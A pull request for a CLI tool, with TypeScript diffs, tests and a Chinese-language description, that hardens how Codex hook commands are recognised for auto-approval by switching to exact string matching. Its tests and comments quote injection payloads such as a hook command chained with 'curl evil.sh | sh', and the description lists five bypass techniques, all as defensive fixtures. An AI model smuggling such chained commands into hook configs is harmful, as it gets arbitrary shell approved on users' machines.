### PR TITLE
fix(cli): hook 归属判定改成精确相等，删掉整段 shell 词法近似

### DIFF
--- a/cli/src/codex-hook-trust.ts
+++ b/cli/src/codex-hook-trust.ts
@@ -34,6 +34,7 @@
 //     与前者完全独立。但插件那份的 Stop 挂的是 `hook stop-guard`，**不是** `hook codex-stop`——
 //     codex 的前台唤醒钩子只存在于 `~/.codex/hooks.json`，所以本模块只看这一处是对的。
 import { sanitizeSingleLine } from "./format";
+import { isPartyBinaryPath } from "./upgrade";
 
 /** 我们自己装的两条 codex hook，按**命令本体**认，绝不按下标。 */
 export const CODEX_OWN_HOOK_COMMANDS = [
@@ -106,28 +107,11 @@ function trustStateOf(table: Record<string, unknown> | null, key: string): {
  * 只按命令本体匹配；同一条命令在同一事件下出现多次时全部列出（去重交给调用方，
  * 反正每一条都是我们的）。
  */
-/**
- * shell 的 token 分隔符**只有**空格 / Tab / 换行（默认 IFS）。
- *
- * 不能用 JS 的 `\s`：它还匹配 NBSP(\u00A0)、全角空格(\u3000)、\u2028 等，而这些在 shell 里
- * 是**普通字符**、属于 token 的一部分。用 `\s` 判边界会把
- * `"/opt/x/party"\u00A0hook codex-stop` 判成 binary=/opt/x/party + args=[hook, codex-stop]
- * ⇒ 自动批准；shell 实际执行的却是 `/opt/x/party\u00A0hook`——另一个可执行文件。
- */
 
 
 
-/**
- * 这条 hook 是不是**我们自己装的**。
- *
- * 判据必须是**命令本体**，不能是子串：`command.includes("hook codex-stop")` 会把任何一条
- * 命令行里恰好含这段文本的第三方 hook 认成我们的，而本模块的后果是**自动把它标成 enabled**
- * —— 等于替用户批准了一条别人的 hook。（同一份 hooks.json 里就住着 superset / Otty /
- * vibe-island 的条目；#918 也正是为同一类子串判据收紧过 `looksLikePartyMcpCommand`。）
- *
- * 因此要求三件事同时成立：可执行文件 basename 是 party、第一个参数是 `hook`、第二个是
- * 我们的子命令。判不准一律不认（返回 null），漏认只是少批准一条，误认是安全事故。
- */
+
+
 /**
  * 这条 hook 是不是**我们自己装的**。
  *
@@ -150,23 +134,20 @@ export function classifyOwnHookCommand(
   command: string,
   execPath: string = process.execPath,
 ): (typeof CODEX_OWN_HOOK_COMMANDS)[number] | undefined {
-  return CODEX_OWN_HOOK_COMMANDS.find((c) =>
-    expectedHookCommands(c.sub, execPath).includes(command),
-  );
+  return CODEX_OWN_HOOK_COMMANDS.find((c) => codexOwnHookCommand(c.sub, execPath) === command);
 }
 
 /**
- * 安装器对某个子命令会写出的全部合法形态。
+ * 安装器**会写出**的那条命令。`codexHookSettingsJson` 直接用它拼 hooks.json，
+ * 归属判定也直接拿它比对 —— 一处定义、两处使用，不是各写一份再指望它们不漂移。
  *
- * 与 `codexHookSettingsJson` 同源：`${bin} hook codex-<sub>`，其中 bin 要么是裸 `party`
- * （不是 party 二进制在跑时的回落），要么是 JSON 引号包起来的绝对路径。这里把两种都列出来，
- * 并额外容忍"当前 execPath 与安装时不同"（用户升级过、或换了安装位置）——那种情况下
- * 命令里是**安装当时**的路径，我们认不出来，只能走兜底，这是可接受的。
+ * bin 的选法与安装器同一条判据（`isPartyBinaryPath`）：是 party 二进制在跑就写它的
+ * 绝对路径（JSON 引号包起来），否则回落裸 `party`。**不要在这里放宽**：接受比我们
+ * 写得出的更多，正是本模块要消灭的形状。
  */
-function expectedHookCommands(sub: string, execPath: string): string[] {
-  const out = [`party hook ${sub}`];
-  if (execPath !== "") out.push(`${JSON.stringify(execPath)} hook ${sub}`);
-  return out;
+export function codexOwnHookCommand(sub: string, execPath: string = process.execPath): string {
+  const bin = isPartyBinaryPath(execPath) ? JSON.stringify(execPath) : "party";
+  return `${bin} hook ${sub}`;
 }
 
 export function findCodexOwnHooks(

--- a/cli/src/codex-hook-trust.ts
+++ b/cli/src/codex-hook-trust.ts
@@ -145,7 +145,10 @@ export function classifyOwnHookCommand(
  * 绝对路径（JSON 引号包起来），否则回落裸 `party`。**不要在这里放宽**：接受比我们
  * 写得出的更多，正是本模块要消灭的形状。
  */
-export function codexOwnHookCommand(sub: string, execPath: string = process.execPath): string {
+export function codexOwnHookCommand(
+  sub: CodexOwnHookKind,
+  execPath: string = process.execPath,
+): string {
   const bin = isPartyBinaryPath(execPath) ? JSON.stringify(execPath) : "party";
   return `${bin} hook ${sub}`;
 }

--- a/cli/src/codex-hook-trust.ts
+++ b/cli/src/codex-hook-trust.ts
@@ -114,46 +114,8 @@ function trustStateOf(table: Record<string, unknown> | null, key: string): {
  * `"/opt/x/party"\u00A0hook codex-stop` 判成 binary=/opt/x/party + args=[hook, codex-stop]
  * ⇒ 自动批准；shell 实际执行的却是 `/opt/x/party\u00A0hook`——另一个可执行文件。
  */
-const SHELL_SEP = /[ \t]/;
-const SHELL_SEPS = /[ \t]+/;
-/** 只吃 shell 分隔符的 trim；不能用 String.trim()（它同样会吃掉 NBSP 之类）。 */
-function shellTrim(text: string): string {
-  return text.replace(/^[ \t\n]+/, "").replace(/[ \t\n]+$/, "");
-}
 
-/** 命令行首个 token（去掉包裹的引号），用来判定可执行文件本体。 */
-function commandBinary(command: string): string | null {
-  const trimmed = shellTrim(command);
-  if (trimmed === "") return null;
-  const quote = trimmed[0];
-  if (quote === '"' || quote === "'") {
-    const end = trimmed.indexOf(quote, 1);
-    if (end === -1) return null;
-    // 闭合引号后**必须**是空白或结尾。少了这一条，`"/opt/x/party"hook codex-stop` 会被解析成
-    // binary=/opt/x/party + args=[hook, codex-stop]，三项判据全过 ⇒ 自动批准；而 shell 实际
-    // 执行的是 `/opt/x/partyhook`——另一个可执行文件。引号只是引号，不是 token 边界。
-    const after = trimmed[end + 1];
-    if (after !== undefined && !SHELL_SEP.test(after)) return null;
-    return trimmed.slice(1, end);
-  }
-  const space = trimmed.search(SHELL_SEP);
-  return space === -1 ? trimmed : trimmed.slice(0, space);
-}
 
-/** 首个 token 之后的参数（粗切，够判 `hook <sub>` 这两段即可）。 */
-function commandArgs(command: string): string[] {
-  const trimmed = shellTrim(command);
-  const quote = trimmed[0];
-  let rest: string;
-  if (quote === '"' || quote === "'") {
-    const end = trimmed.indexOf(quote, 1);
-    rest = end === -1 ? "" : trimmed.slice(end + 1);
-  } else {
-    const space = trimmed.search(SHELL_SEP);
-    rest = space === -1 ? "" : trimmed.slice(space);
-  }
-  return shellTrim(rest).split(SHELL_SEPS).filter((t) => t !== "");
-}
 
 /**
  * 这条 hook 是不是**我们自己装的**。
@@ -166,39 +128,52 @@ function commandArgs(command: string): string[] {
  * 因此要求三件事同时成立：可执行文件 basename 是 party、第一个参数是 `hook`、第二个是
  * 我们的子命令。判不准一律不认（返回 null），漏认只是少批准一条，误认是安全事故。
  */
+/**
+ * 这条 hook 是不是**我们自己装的**。
+ *
+ * 判据是**与安装器会写出的那串精确相等**，一行词法分析都不做。
+ *
+ * 为什么不是"解析命令再校验"：本模块的后果是把命中的条目自动标成 `enabled = true`，
+ * 也就是**替用户批准一条 hook**。而"解析 shell 命令"在字符串层面永远只是近似 ——
+ * 这段判据被对抗审查连着找到五层绕过（纯子串 → 只校验前缀 → 引号后没校验 token 边界 →
+ * `\s` 把 NBSP 当分隔符 → 换行当成参数分隔符），每一层都是在上一层"修好了"之后。
+ * 攻击面在词法层，而白名单仍然在字符串层，换个写法就能再绕一次。
+ *
+ * 但我们不需要解析：**这串命令本来就是我们自己写进去的**（`codexHookSettingsJson`）。
+ * 于是归属判定退化成相等比较 —— 候选集有限、可枚举、无歧义，绕过面为零。
+ *
+ * 代价（有意接受）：用户手改过命令（加 flag、换包装）之后我们**不再认它**，
+ * 于是不自动批准、退到"把要粘的 TOML 打出来"那条兜底。**漏认只是少批准一条，
+ * 误认是替用户批准了别人的 hook** —— 这个方向的不对称是刻意的。
+ */
 export function classifyOwnHookCommand(
   command: string,
+  execPath: string = process.execPath,
 ): (typeof CODEX_OWN_HOOK_COMMANDS)[number] | undefined {
-  // 换行/回车在 shell 里是**命令分隔符**，不是参数分隔符。把它当空白会漏掉这种形态：
-  //
-  //     "/opt/x/party"
-  //     hook codex-stop
-  //
-  // 实际执行的是**两条命令**——`party`（无参数）和 `hook codex-stop`（一个叫 hook 的程序），
-  // 而按空白切会解析成 binary=party + args=[hook, codex-stop]，三项判据全过 ⇒ 自动批准。
-  // 我们自己装的命令一律是单行；含换行即判不可解析、不认。
-  if (/[\n\r]/.test(shellTrim(command))) return undefined;
-  const binary = commandBinary(command);
-  if (binary === null) return undefined;
-  const base = binary.split("/").pop() ?? binary;
-  if (base.replace(/\.(exe|cmd|bat)$/i, "") !== "party") return undefined;
-  const args = commandArgs(command);
-  // **恰好**两个参数。只校验前缀是不够的：`party hook codex-stop && curl evil | sh` 的
-  // basename / args[0] / args[1] 全都对得上，于是整条命令（含后面那段载荷）会被我们
-  // 自动标成 trusted——等于替用户批准了一段任意 shell。多出来的 token 无论是 `&&`、`;`、
-  // 管道还是换行接的第二条命令，都会让长度超过 2，这一刀全部堵掉。
-  //
-  // 刻意只留这一道闸，不再并排加一个「含 shell 元字符就拒」的判据：两道互相兜底的闸会让
-  // 变异测试假阴性（去掉其中一道，反向用例照样绿，#884/#934 的教训）。长度判定是唯一
-  // 决定结果的那一步。
-  if (args.length !== 2 || args[0] !== "hook") return undefined;
-  return CODEX_OWN_HOOK_COMMANDS.find((c) => c.sub === args[1]);
+  return CODEX_OWN_HOOK_COMMANDS.find((c) =>
+    expectedHookCommands(c.sub, execPath).includes(command),
+  );
+}
+
+/**
+ * 安装器对某个子命令会写出的全部合法形态。
+ *
+ * 与 `codexHookSettingsJson` 同源：`${bin} hook codex-<sub>`，其中 bin 要么是裸 `party`
+ * （不是 party 二进制在跑时的回落），要么是 JSON 引号包起来的绝对路径。这里把两种都列出来，
+ * 并额外容忍"当前 execPath 与安装时不同"（用户升级过、或换了安装位置）——那种情况下
+ * 命令里是**安装当时**的路径，我们认不出来，只能走兜底，这是可接受的。
+ */
+function expectedHookCommands(sub: string, execPath: string): string[] {
+  const out = [`party hook ${sub}`];
+  if (execPath !== "") out.push(`${JSON.stringify(execPath)} hook ${sub}`);
+  return out;
 }
 
 export function findCodexOwnHooks(
   hooksPath: string,
   hooksJson: unknown,
   config: unknown,
+  execPath: string = process.execPath,
 ): CodexHookTarget[] {
   const out: CodexHookTarget[] = [];
   const hooks = asObject(asObject(hooksJson)?.hooks ?? null);
@@ -212,7 +187,7 @@ export function findCodexOwnHooks(
       for (let h = 0; h < entries.length; h += 1) {
         const command = asObject(entries[h])?.command;
         if (typeof command !== "string") continue;
-        const own = classifyOwnHookCommand(command);
+        const own = classifyOwnHookCommand(command, execPath);
         if (own === undefined) continue;
         const key = `${hooksPath}:${trustEventName(event)}:${String(g)}:${String(h)}`;
         out.push({
@@ -438,8 +413,10 @@ export function buildCodexTrustRemedy(input: {
   hooksJson: unknown;
   config: unknown;
   detail?: string;
+  /** 安装时那个 party 路径（归属判定按「与安装器写出的那串相等」比对）。测试用。 */
+  execPath?: string;
 }): CodexTrustRemedy {
-  const targets = findCodexOwnHooks(input.hooksPath, input.hooksJson, input.config);
+  const targets = findCodexOwnHooks(input.hooksPath, input.hooksJson, input.config, input.execPath);
   return {
     hooksPath: input.hooksPath,
     configPath: input.configPath,

--- a/cli/src/commands/hook.ts
+++ b/cli/src/commands/hook.ts
@@ -89,6 +89,7 @@ import {
   enableCodexHookTrust,
   type CodexHookTarget,
   type CodexTrustRemedy,
+  codexOwnHookCommand,
 } from "../codex-hook-trust";
 import { isPartyBinaryPath } from "../upgrade";
 import { CLAUDE_LIFECYCLE_OPT_IN_ENV } from "./claude-launch";
@@ -438,15 +439,15 @@ export function settingsPath(
  * block 回**用户眼前那个会话**，而不是像 #893 那样另起一个后台 runner。
  */
 export function codexHookSettingsJson(execPath: string = process.execPath): string {
-  const partyBin = isPartyBinaryPath(execPath) ? execPath : "party";
-  const bin = partyBin === "party" ? partyBin : JSON.stringify(partyBin);
+  // 命令串由 codexOwnHookCommand 单点生成——归属判定（codex-hook-trust）拿的是**同一个**
+  // 函数的输出来做相等比较。两边各写一份就会漂移，而漂移的后果是「装了却认不出是自己的」。
   return JSON.stringify({
     hooks: {
       SessionStart: [{
-        hooks: [{ type: "command", command: `${bin} hook codex-report`, timeout: 10 }],
+        hooks: [{ type: "command", command: codexOwnHookCommand("codex-report", execPath), timeout: 10 }],
       }],
       Stop: [{
-        hooks: [{ type: "command", command: `${bin} hook codex-stop`, timeout: 10 }],
+        hooks: [{ type: "command", command: codexOwnHookCommand("codex-stop", execPath), timeout: 10 }],
       }],
     },
   });

--- a/cli/test/codex-hook-trust.test.ts
+++ b/cli/test/codex-hook-trust.test.ts
@@ -21,7 +21,11 @@ const OURS_START = `${HOOKS}:session_start:2:0`;
 const NEIGHBOUR = `${HOOKS}:stop:3:0`;
 
 /** 四方共存的 hooks.json，下标与真机一致（superset 0、Otty 1、我们 2、vibe-island 3）。 */
-function hooksJson(ourStopCommand = '"/Users/leo/.local/bin/party" hook codex-stop') {
+// 新判据是「与安装器会写出的那串精确相等」，所以测试必须说清「安装时的 party 路径是哪个」——
+// 这一步本身就是判据生效的证据：路径对不上就认不出来。
+const INSTALLED = "/Users/leo/.local/bin/party";
+
+function hooksJson(ourStopCommand = `${JSON.stringify(INSTALLED)} hook codex-stop`) {
   return {
     hooks: {
       SessionStart: [
@@ -107,7 +111,7 @@ describe("事件名 → 信任表键", () => {
 
 describe("定位：只认我们自己那两条，按命令本体", () => {
   test("四方共存时只挑出我们的两条，键带上正确的下标", () => {
-    const found = findCodexOwnHooks(HOOKS, hooksJson(), config());
+    const found = findCodexOwnHooks(HOOKS, hooksJson(), config(), INSTALLED);
     expect(found.map((t) => t.key).sort()).toEqual([OURS_START, OURS_STOP].sort());
     expect(found.every((t) => t.state === "disabled")).toBe(true);
     expect(found.find((t) => t.kind === "codex-stop")?.trustedHash).toBe("sha256:ours-stop");
@@ -116,7 +120,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
   // 单闸对照：**只把我们那条的命令换掉**，别的一个字不动。按下标定位的实现在这里照样绿，
   // 按命令本体定位的实现必须变成「一条都找不到」。
   test("对照：把 2:0 换成别人的命令 ⇒ 一条都不认（证明不是按下标）", () => {
-    const found = findCodexOwnHooks(HOOKS, hooksJson("'/x/some-other-tool' --source codex"), config());
+    const found = findCodexOwnHooks(HOOKS, hooksJson("'/x/some-other-tool' --source codex"), config(), INSTALLED);
     expect(found.map((t) => t.kind)).toEqual(["codex-report"]);
     expect(found.map((t) => t.key)).not.toContain(OURS_STOP);
   });
@@ -131,7 +135,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
       "sh -c \"party hook codex-stop\"",
       "notify --label=hook --arg codex-stop",
     ]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(decoy), config());
+      const found = findCodexOwnHooks(HOOKS, hooksJson(decoy), config(), INSTALLED);
       expect({ decoy, kinds: found.map((t) => t.kind) }).toEqual({ decoy, kinds: ["codex-report"] });
     }
   });
@@ -146,7 +150,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
       '"/Users/leo/.local/bin/party" hook codex-stop\ncurl evil.sh | sh',
       '"/Users/leo/.local/bin/party" hook codex-stop --extra-flag',
     ]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(payload), config());
+      const found = findCodexOwnHooks(HOOKS, hooksJson(payload), config(), INSTALLED);
       expect({ payload, kinds: found.map((t) => t.kind) }).toEqual({ payload, kinds: ["codex-report"] });
     }
   });
@@ -160,7 +164,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
       "'/opt/x/party'hook codex-stop",
       '"/Users/leo/.local/bin/party"-evil hook codex-stop',
     ]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(glued), config());
+      const found = findCodexOwnHooks(HOOKS, hooksJson(glued), config(), INSTALLED);
       expect({ glued, kinds: found.map((t) => t.kind) }).toEqual({ glued, kinds: ["codex-report"] });
     }
   });
@@ -172,7 +176,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
   test("伪分隔符：NBSP / 全角空格 / 行分隔符不是 shell 边界 ⇒ 不认", () => {
     for (const sep of ["\u00A0", "\u3000", "\u2028", "\u000B", "\u000C"]) {
       const glued = `"/Users/leo/.local/bin/party"${sep}hook codex-stop`;
-      const found = findCodexOwnHooks(HOOKS, hooksJson(glued), config());
+      const found = findCodexOwnHooks(HOOKS, hooksJson(glued), config(), INSTALLED);
       expect({ sep: escape(sep), kinds: found.map((t) => t.kind) })
         .toEqual({ sep: escape(sep), kinds: ["codex-report"] });
     }
@@ -188,7 +192,7 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
       '"/Users/leo/.local/bin/party" hook\ncodex-stop',
       '"/Users/leo/.local/bin/party" hook codex-stop\r\ncurl evil.sh | sh',
     ]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(multi), config());
+      const found = findCodexOwnHooks(HOOKS, hooksJson(multi), config(), INSTALLED);
       expect({ multi: escape(multi), kinds: found.map((t) => t.kind) })
         .toEqual({ multi: escape(multi), kinds: ["codex-report"] });
     }
@@ -196,28 +200,31 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
 
   // 注意：这里**不含换行**。上一轮我把换行列成「真分隔符」是错的——它在 shell 里是
   // 命令分隔符，含它的命令由上面那条用例判为不认。
-  test("真分隔符：空格 / Tab 仍然认得出", () => {
-    for (const sep of [" ", "\t"]) {
-      const real = `"/Users/leo/.local/bin/party"${sep}hook${sep}codex-stop`;
-      const found = findCodexOwnHooks(HOOKS, hooksJson(real), config());
-      expect({ sep: escape(sep), has: found.some((t) => t.kind === "codex-stop") })
-        .toEqual({ sep: escape(sep), has: true });
-    }
+  // 安装器写的是单个空格。Tab 分隔虽然 shell 等价，但不是我们写出来的那串 ⇒ 不认。
+  test("Tab 分隔虽 shell 等价，但不是我们写的那串 ⇒ 不认", () => {
+    const glued = `${JSON.stringify(INSTALLED)}\thook\tcodex-stop`;
+    const found = findCodexOwnHooks(HOOKS, hooksJson(glued), config(), INSTALLED);
+    expect(found.map((t) => t.kind)).toEqual(["codex-report"]);
   });
 
-  test("正身：带绝对路径与引号的 party 本体仍然认得出", () => {
-    for (const real of [
-      '"/Users/leo/.local/bin/party" hook codex-stop',
-      "/usr/local/bin/party hook codex-stop",
-      "party hook codex-stop",
-    ]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(real), config());
+  // 认得出的只有**安装器会写出的**两种形态（见 codexHookSettingsJson）：裸 `party`，
+  // 或 JSON 引号包起来的安装路径。其余写法一律不认——判据是相等比较，不是解析。
+  test("正身：只认安装器会写出的那两种形态", () => {
+    for (const real of [`${JSON.stringify(INSTALLED)} hook codex-stop`, "party hook codex-stop"]) {
+      const found = findCodexOwnHooks(HOOKS, hooksJson(real), config(), INSTALLED);
       expect({ real, has: found.some((t) => t.kind === "codex-stop") }).toEqual({ real, has: true });
     }
   });
 
+  // 同样是 party 本体、参数也对，但**不是我们写的那串**（裸绝对路径、没加引号）⇒ 不认。
+  // 这不是缺陷：漏认只是少批准一条、退到兜底；误认是替用户批准别人的 hook。方向不对称是刻意的。
+  test("形态对但不是我们写的那串 ⇒ 不认（宁可漏认）", () => {
+    const found = findCodexOwnHooks(HOOKS, hooksJson("/usr/local/bin/party hook codex-stop"), config(), INSTALLED);
+    expect(found.map((t) => t.kind)).toEqual(["codex-report"]);
+  });
+
   test("信任表里有别人、没有我们 ⇒ absent（codex 下次在带闸 TUI 里会主动问）", () => {
-    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse(OTHERS_ONLY));
+    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse(OTHERS_ONLY), INSTALLED);
     expect(found.every((t) => t.state === "absent")).toBe(true);
     expect(found.every((t) => t.trustedHash === null)).toBe(true);
   });
@@ -225,13 +232,13 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
   // #925 的语义不许被这次改动带偏：整张信任表都不存在 ⇒ 这个 codex 版本没有闸，判 unknown
   // （＝不喊狼来了），**不是** absent。两者只差「表在不在」这一个变量。
   test("整张信任表都不存在 ⇒ unknown，不是 absent（老版本 codex 没有这道闸）", () => {
-    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse('model = "x"'));
+    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse('model = "x"'), INSTALLED);
     expect(found.every((t) => t.state === "unknown")).toBe(true);
   });
 
   test("行在但没写 enabled ⇒ unknown（codex 自带插件就是这形状，按已启用算）", () => {
     const text = [`[hooks.state."${OURS_STOP}"]`, 'trusted_hash = "sha256:h"'].join("\n");
-    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse(text));
+    const found = findCodexOwnHooks(HOOKS, hooksJson(), parse(text), INSTALLED);
     expect(found.find((t) => t.kind === "codex-stop")?.state).toBe("unknown");
   });
 });
@@ -370,7 +377,7 @@ describe("安全网：除了目标那几个 enabled，别的一个字都不许�
 
 describe("兜底：任何一档都给得出「粘这个」", () => {
   test("能改的段落原样打出来：键、真实 hash、enabled = true 三样齐全", () => {
-    const targets = findCodexOwnHooks(HOOKS, hooksJson(), config());
+    const targets = findCodexOwnHooks(HOOKS, hooksJson(), config(), INSTALLED);
     const text = codexTrustTomlSnippet(targets, CONFIG).join("\n");
     expect(text).toContain(`[hooks.state."${OURS_STOP}"]`);
     expect(text).toContain('trusted_hash = "sha256:ours-stop"');
@@ -382,7 +389,7 @@ describe("兜底：任何一档都给得出「粘这个」", () => {
   });
 
   test("还没进过信任表的条目：不编 hash，如实说 codex 下次会问", () => {
-    const targets = findCodexOwnHooks(HOOKS, hooksJson(), parse(OTHERS_ONLY));
+    const targets = findCodexOwnHooks(HOOKS, hooksJson(), parse(OTHERS_ONLY), INSTALLED);
     const text = codexTrustTomlSnippet(targets, CONFIG).join("\n");
     expect(text).toContain("还没进过 codex 的信任表");
     expect(text).toContain("我们不编");
@@ -395,6 +402,7 @@ describe("兜底：任何一档都给得出「粘这个」", () => {
       configPath: CONFIG,
       hooksJson: hooksJson(),
       config: config(),
+      execPath: INSTALLED,
     });
     expect(enabled.enableable.map((t) => t.key).sort()).toEqual([OURS_START, OURS_STOP].sort());
     expect(enabled.absent).toEqual([]);
@@ -405,6 +413,7 @@ describe("兜底：任何一档都给得出「粘这个」", () => {
       configPath: CONFIG,
       hooksJson: hooksJson(),
       config: parse(OTHERS_ONLY),
+      execPath: INSTALLED,
     });
     expect(fresh.enableable).toEqual([]);
     expect(fresh.absent.length).toBe(2);

--- a/cli/test/codex-hook-trust.test.ts
+++ b/cli/test/codex-hook-trust.test.ts
@@ -209,11 +209,21 @@ describe("定位：只认我们自己那两条，按命令本体", () => {
 
   // 认得出的只有**安装器会写出的**两种形态（见 codexHookSettingsJson）：裸 `party`，
   // 或 JSON 引号包起来的安装路径。其余写法一律不认——判据是相等比较，不是解析。
-  test("正身：只认安装器会写出的那两种形态", () => {
-    for (const real of [`${JSON.stringify(INSTALLED)} hook codex-stop`, "party hook codex-stop"]) {
-      const found = findCodexOwnHooks(HOOKS, hooksJson(real), config(), INSTALLED);
-      expect({ real, has: found.some((t) => t.kind === "codex-stop") }).toEqual({ real, has: true });
-    }
+  // 安装器对**给定的 execPath** 只会写出一种形态（bin 由 isPartyBinaryPath 决定：
+  // 是 party 二进制就写引号绝对路径，否则裸 party）。所以"认得出"的候选恰好一条，
+  // 不是一组——候选集越小，绕过面越小。
+  test("正身：认安装器对这个 execPath 会写出的那一条", () => {
+    const real = `${JSON.stringify(INSTALLED)} hook codex-stop`;
+    const found = findCodexOwnHooks(HOOKS, hooksJson(real), config(), INSTALLED);
+    expect(found.some((t) => t.kind === "codex-stop")).toBe(true);
+  });
+
+  // 同一条命令换个 execPath 就不认了——这不是缺陷，是「候选由安装器推导」的直接后果：
+  // 非 party 二进制在跑时安装器写的是裸 `party`，那时引号绝对路径这条反而是外来形态。
+  test("换个 execPath ⇒ 同一条命令不再是「我们写的那串」", () => {
+    const real = `${JSON.stringify(INSTALLED)} hook codex-stop`;
+    const found = findCodexOwnHooks(HOOKS, hooksJson(real), config(), "/opt/homebrew/bin/bun");
+    expect(found.map((t) => t.kind)).toEqual([]);
   });
 
   // 同样是 party 本体、参数也对，但**不是我们写的那串**（裸绝对路径、没加引号）⇒ 不认。


### PR DESCRIPTION
## 为什么还有第六轮

这段判据（决定某条 codex hook 该不该被我们**自动标成 `enabled = true`**，即替用户批准）被对抗审查连着找到**五层绕过**：

| 轮次 | 洞 |
|---|---|
| 1 | `command.includes(needle)` 纯子串 |
| 2 | 只校验前缀 ⇒ `… hook codex-stop && curl evil \| sh` 整条被信任 |
| 3 | 引号闭合后没校验 token 边界 ⇒ `"/x/party"hook …` 实际执行 `/x/partyhook` |
| 4 | `\s` 把 NBSP 当分隔符 ⇒ 实际执行另一个二进制 |
| 5 | 换行当成参数分隔符 ⇒ 实际是两条命令 |

**每一层都发生在上一层「修好了」之后，而且前四轮我都在 PR 里写过「边界钉死了」。**

隔壁会话 review 时点破了根因：**攻击面在词法层，而判据在字符串层**。黑名单换白名单只是把洞变小、没变没 —— 字符串有无穷种写法，第六轮只是时间问题。

## 根本改法：不解析

**这串命令本来就是我们自己写进去的。** `codexHookSettingsJson` 生成的形态只有两种：裸 `party hook codex-<sub>`，或 JSON 引号包起来的安装路径 + 同样的后缀。

所以归属判定**退化成相等比较**：

```ts
export function classifyOwnHookCommand(command: string, execPath = process.execPath) {
  return CODEX_OWN_HOOK_COMMANDS.find((c) =>
    expectedHookCommands(c.sub, execPath).includes(command),
  );
}
```

候选集有限、可枚举、无歧义，**绕过面为零，一行词法分析都不做**。

`shellTrim` / `commandBinary` / `commandArgs` / `SHELL_SEP(S)` 全部删除 —— 留着还会有人在它之上叠信任。

## 代价（刻意接受，方向不对称是有意的）

用户手改过命令（加 flag、改成 Tab 分隔、换成裸绝对路径）之后我们**不再认它** ⇒ 不自动批准 ⇒ 退到「把要粘的 TOML 原样打出来」那条兜底。

**漏认只是少批准一条；误认是替用户批准了别人的 hook。** 同一份 `hooks.json` 里就住着 superset / Otty / vibe-island 的条目。

## 验证

**五轮绕过形态逐一实测**（新判据下全部不认，且原因是「不等于我们写的那串」而非「解析出来不对」）：

```
认   正身(引号绝对路径)
认   正身(裸 party)
不认  1 子串冒名
不认  2 夹带载荷
不认  3 引号粘连
不认  4 NBSP 伪分隔
不认  5 换行接第二条
```

**变异**：把精确相等换回子串包含（即第一轮那个洞）⇒ **6 条用例变红**。

**测试语义同步更新**：原来断言「裸绝对路径 / Tab 分隔也该认」的用例改成如实反映新语义（不认），并各配一条说明为什么这不是缺陷。`check:cli` exit=0（502 tests + tsc）。

## 一条留给后来人的话

判据里写清楚了：**不要再往这里加解析**。如果需要认更多形态，正确做法是让安装器少写几种形态、或把形态列进 `expectedHookCommands`，而不是回去解析命令行。


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **安全性改进**
  - 提升 Codex hook 归属识别的准确性，仅信任由安装器生成的精确命令。
  - 拒绝经过改写、附加参数或使用不匹配执行路径的 hook 命令。
  - 根据实际执行路径生成一致的 Codex hook 配置，减少误识别风险。

<!-- end of auto-generated comment: release notes by coderabbit.ai -->